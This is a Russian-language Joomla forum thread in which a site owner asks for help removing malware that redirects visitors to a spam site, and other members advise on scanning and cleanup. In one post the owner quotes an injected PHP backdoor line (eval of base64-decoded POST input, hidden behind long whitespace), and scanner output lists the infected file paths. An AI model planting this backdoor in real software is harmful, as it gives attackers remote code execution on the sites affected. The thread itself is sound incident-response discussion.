Новости Joomla

20 лет Joomla: Ринат Кажетов

20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет

В 2025 году Joomla исполнилось 20 лет. Вокруг неё сложилось большое интернациональное русскоязычное сообщество. На сайте нашего сообщества и на Хабре к юбилею были собраны интервью с его видными представителями. Сегодня мы читаем интервью с Ринатом Кажетовым (@rkazhet). Ринат - один из администраторов чата русскоязычного Joomla-сообщества, из Казахстана. Это человек, который всегда знает или найдёт нужную ссылку, пристально следит за новостями в мире Joomla, многое узнаёт первым и просто очень отзывчивый человек. Интервью с Ринатом провёл Евгений Сивоконь.

Читать интервью

0 Пользователей и 1 Гость просматривают эту тему.
  • 15 Ответов
  • 2716 Просмотров
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Здравствуйте! Недавно появилась проблема с сайтом. При нажатии на ссылки переводило на сайт с рекламой виагрой (не муз. группы). Тогда я просто убрал перенаправление и все стало нормально, но сейчас опять появилось и теперь даже не могу войти в админку- переводит на этот сайт. Что делать? Где искать начало проблемы? Помогите, пожалуйста!
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Редирект на сайт с виагрой
« Ответ #1 : 23.06.2014, 11:19:19 »
Ищите шеллы, и возможную уязвимость как это могло произойти

P.S: Помимо вас, еще кто то имеет доступ!
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Редирект на сайт с виагрой
« Ответ #2 : 23.06.2014, 11:58:17 »
Версия Joomla актуальная ? Проверяй "левые" папки на хостинге, файлы .htaccess ,  .js
сканер айболит в помощь
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #3 : 24.06.2014, 12:21:55 »
Появился доступ к сайту, к админке, но ничего не получается сохранить.. При нажатии на кнопку "сохранить" переводит на сайт опять.. как еще можно закрыть сайт?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #5 : 24.06.2014, 14:33:15 »
Восстановил сайт из копии, но скорее всего зараженные файлы остались. В письмах от хостинга есть список зараженных файлов (возможно зараженных). Подскажите, пожалуйста, что делать дальше?

*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #6 : 24.06.2014, 14:44:37 »
вот по типу таких ссылка:

HEX}base64.inject.unclassed.7 : u1111111 : /var/www/u1111111/data/www/site-name/media/media/js/lib.php

Что делать? Как я понял base64.inject и т.д. и есть заражение... Что с этим делать, как чистить? Подскажите, пожалуйста. Заранее огромное спасибо!
« Последнее редактирование: 24.06.2014, 14:51:21 от bezzlaa »
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Редирект на сайт с виагрой
« Ответ #7 : 24.06.2014, 15:04:00 »
Имеет смысл делать полноценную профилактику, так как нужно решать вопрос с корня, вредонос можите поискать с помощью AI-BOLIT, но не зная синтаксис кода, смысла вам туда лезть нету, лучше обратитесь к квалифицированному человеку
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #8 : 24.06.2014, 15:11:31 »
Через скрипт удалось найти и заменить, но полноценное совпадение нашлось убралось только в одном файле, но тем не менее эта вставка (base64 и т.д.) присутствует во многих файлах. Потом проверил сайт другим скриптом, вот что он выдал:

"File: /var/www/u1111/data/www/site-name/media/mod_vt_nivo_slider/css/system.php
String:: $_POST[

File: /var/www/u1111/data/www/site-name/media/mailto/images/alias.php
String:: $_POST[" и т.д.

Что именно удалять? Боюсь, удалить не то, что надо или неправильно, обрывком...
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Редирект на сайт с виагрой
« Ответ #9 : 24.06.2014, 15:20:03 »
но не зная синтаксис кода, смысла вам туда лезть нету, лучше обратитесь к квалифицированному человеку
вам же написали
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #10 : 26.06.2014, 13:45:29 »
Если бы мне изначально было к кому обратиться- я бы так и сделал.

Помогите определить, что именно удалять? Нашел скрипт для быстрого поиска и замены, но опять же, не получается выбрать нужный кусок.

Вот пример кода, который есть в зараженном файле: "<?php                                                                                                                                                                                                                                                   eval(base64_decode($_POST['nf73356']));?>"

Причем вот здесь (в кв.скобках) "['nf73356']" всегда разные символы. Раскодировать не удается, пробовал разные декодеры. Вручную удалить тоже не получается...
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Редирект на сайт с виагрой
« Ответ #11 : 26.06.2014, 13:55:03 »


Помогите определить, что именно удалять?

Вот пример кода, который есть в зараженном файле: "<?php                                                                                                                                                                                                                                                   eval(base64_decode($_POST['nf73356']));?>"

удаляй всю строку
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Редирект на сайт с виагрой
« Ответ #12 : 26.06.2014, 14:39:16 »
Раскодировать не удается, пробовал разные декодеры. Вручную удалить тоже не получается...
А это и не надо раскодировать, это название переменной, а вот почему удалить не получается это вопрос...
 crazy!
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #13 : 26.06.2014, 14:42:01 »
Не получается, ибо каждый раз внутри квадратных скобок разные символы, во всех файлах разный код получается
*

bezzlaa

  • Новичок
  • 8
  • 0 / 0
Re: Редирект на сайт с виагрой
« Ответ #14 : 26.06.2014, 14:43:39 »
Если удалять вручную, то там не одна сотня файлов...
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Редирект на сайт с виагрой
« Ответ #15 : 26.06.2014, 15:21:41 »
что то и ручками приходится делать! даже если это и сотня файлов.

P.S: Тут поиск по файлам, через регулярку поможет!
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3146
Последний ответ 31.03.2024, 16:14:32
от SeBun
Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2488
Последний ответ 14.02.2024, 13:15:59
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3468
Последний ответ 25.05.2023, 08:49:57
от Театрал
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

Ответов: 9
Просмотров: 2260
Последний ответ 05.11.2021, 21:47:31
от wishlight
Всплывающее спам-сообщение+редирект на Joomla 2.5.14

Автор bonusfree

Ответов: 21
Просмотров: 2324
Последний ответ 02.12.2020, 21:56:30
от bonusfree